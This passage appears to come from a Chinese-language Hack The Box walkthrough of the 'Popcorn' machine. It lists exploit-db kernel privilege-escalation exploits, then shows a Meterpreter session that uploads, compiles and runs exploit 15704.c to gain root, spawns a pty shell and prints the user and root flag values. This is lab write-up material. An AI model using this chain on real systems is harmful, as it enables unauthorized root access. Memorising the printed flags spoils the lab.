Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)                                                                                       | exploits/linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)                                                                                        | exploits/linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak                                                                                                        | exploits/linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation                                                                                             | exploits/linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure                                                                                                               | exploits/linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                                                                                                  | exploits/linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                                                                                                    | exploits/linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service                                                                                                         | exploits/linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service                                                                                                      | exploits/linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)                                                                                                    | exploits/linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)                                                                             | exploits/linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)                                                                         | exploits/linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation                                                                              | exploits/linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation                                                                                | exploits/linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure                                                                                | exploits/linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation                                                                                  | exploits/linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation                                                                                           | exploits/linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)                                                                                         | exploits/linux/dos/16952.c
Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation                                                 | exploits/linux/local/718.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution                                                                                                             | exploits/multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation                                                                        | exploits/linux/local/12130.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

我挑了一些测试,大概测试了10个左右,发现了可以提权的exp,获得了user和root的flag。

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/15704.c
[*] uploading  : /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
[*] Uploaded -1.00 B of 9.26 KiB (-0.01%): /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
[*] uploaded   : /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
meterpreter > shell
Process 3057 created.
Channel 24 created.
gcc 15704.c -o exp7
ls -la
total 492
drwxrwxrwx  2 www-data www-data  4096 Feb  2 13:55 .
drwxr-xr-x 15 www-data www-data  4096 Feb  2 10:49 ..
-rw-r--r--  1 www-data www-data 30689 Feb  2 10:13 0b2932414e4e41e18008918ba6219201142c21d0.php
-rw-r--r--  1 www-data www-data  6381 Feb  2 10:03 0b2932414e4e41e18008918ba6219201142c21d0.png
-rw-r--r--  1 www-data www-data 15608 Feb  2 13:36 14814.c
-rw-r--r--  1 www-data www-data 25298 Feb  2 13:41 15024.c
-rw-r--r--  1 www-data www-data  8835 Feb  2 13:43 15150.c
-rw-r--r--  1 www-data www-data  9487 Feb  2 13:54 15704.c
-rw-r--r--  1 www-data www-data  9204 Feb  2 13:30 15916.c
-rw-r--r--  1 www-data www-data 14922 Feb  2 13:38 17787.c
-rw-r--r--  1 www-data www-data 16153 Feb  2 13:26 33321.c
-rw-r--r--  1 www-data www-data 16587 Feb  2 13:28 40812.c
-rw-r--r--  1 www-data www-data 59294 Mar 17  2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r--  1 www-data www-data 32060 Feb  2 11:06 a.txt
-rwxr-xr-x  1 www-data www-data 13854 Feb  2 13:27 exp1
-rwxr-xr-x  1 www-data www-data 13166 Feb  2 13:30 exp2
-rwxr-xr-x  1 www-data www-data 13819 Feb  2 13:36 exp3
-rwxr-xr-x  1 www-data www-data 23800 Feb  2 13:41 exp5
-rwxr-xr-x  1 www-data www-data 13458 Feb  2 13:44 exp6
-rwxr-xr-x  1 www-data www-data 13557 Feb  2 13:55 exp7
-rwxrwxrwx  1 www-data www-data 46631 Feb  2 11:04 le.sh
-rw-r--r--  1 www-data www-data 25304 Feb  2 11:17 lpc.py
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
-rwxrwxrwx  1 www-data www-data   207 Feb  2 13:14 pc_shell
./exp7  
ls -la
total 492
drwxrwxrwx  2 www-data www-data  4096 Feb  2 13:55 .
drwxr-xr-x 15 www-data www-data  4096 Feb  2 10:49 ..
-rw-r--r--  1 www-data www-data 30689 Feb  2 10:13 0b2932414e4e41e18008918ba6219201142c21d0.php
-rw-r--r--  1 www-data www-data  6381 Feb  2 10:03 0b2932414e4e41e18008918ba6219201142c21d0.png
-rw-r--r--  1 www-data www-data 15608 Feb  2 13:36 14814.c
-rw-r--r--  1 www-data www-data 25298 Feb  2 13:41 15024.c
-rw-r--r--  1 www-data www-data  8835 Feb  2 13:43 15150.c
-rw-r--r--  1 www-data www-data  9487 Feb  2 13:54 15704.c
-rw-r--r--  1 www-data www-data  9204 Feb  2 13:30 15916.c
-rw-r--r--  1 www-data www-data 14922 Feb  2 13:38 17787.c
-rw-r--r--  1 www-data www-data 16153 Feb  2 13:26 33321.c
-rw-r--r--  1 www-data www-data 16587 Feb  2 13:28 40812.c
-rw-r--r--  1 www-data www-data 59294 Mar 17  2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r--  1 www-data www-data 32060 Feb  2 11:06 a.txt
-rwxr-xr-x  1 www-data www-data 13854 Feb  2 13:27 exp1
-rwxr-xr-x  1 www-data www-data 13166 Feb  2 13:30 exp2
-rwxr-xr-x  1 www-data www-data 13819 Feb  2 13:36 exp3
-rwxr-xr-x  1 www-data www-data 23800 Feb  2 13:41 exp5
-rwxr-xr-x  1 www-data www-data 13458 Feb  2 13:44 exp6
-rwxr-xr-x  1 www-data www-data 13557 Feb  2 13:55 exp7
-rwxrwxrwx  1 www-data www-data 46631 Feb  2 11:04 le.sh
-rw-r--r--  1 www-data www-data 25304 Feb  2 11:17 lpc.py
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
-rwxrwxrwx  1 www-data www-data   207 Feb  2 13:14 pc_shell
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@popcorn:/var/www/torrent/upload# whoami
whoami
root
root@popcorn:/var/www/torrent/upload# cd /home/ 
lcd /home/
root@popcorn:/home#ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Mar 17  2017 .
drwxr-xr-x 21 root   root   4096 Feb  1 11:32 ..
drwxr-xr-x  3 george george 4096 Mar 17  2017 george
root@popcorn:/home# cd george
cd george
root@popcorn:/home/george# ls -la
ls -la
total 872
drwxr-xr-x 3 george george   4096 Mar 17  2017 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
-rw------- 1 root   root     2769 May  5  2017 .bash_history
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw------- 1 root   root     1571 Mar 17  2017 .mysql_history
-rw------- 1 root   root       19 May  5  2017 .nano_history
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Mar 17  2017 user.txt
root@popcorn:/home/george# cat user.txt
cat user.txt
5e36a919398ecc5d5c110f2d865cf136
root@popcorn:/home/george# cd /root
cd /root
root@popcorn:/root# ls -la
ls -la
total 40
drwx------  5 root root 4096 Apr 11  2017 .
drwxr-xr-x 21 root root 4096 Feb  1 11:32 ..
drwx------  2 root root 4096 Mar 17  2017 .aptitude
-rw-------  1 root root  637 Sep 24  2017 .bash_history
-rw-r--r--  1 root root 2227 Apr 27  2009 .bashrc
drwxr-xr-x  2 root root 4096 Mar 27  2017 .cache
drwxr-xr-x  2 root root 4096 Mar 17  2017 .debtags
-rw-------  1 root root  368 Apr 11  2017 .mysql_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-------  1 root root   33 Mar 17  2017 root.txt
root@popcorn:/root# cat root.txt
cat root.txt
f122331023a9393319a0370129fd9b14

 

你可能感兴趣的:(HTB靶场)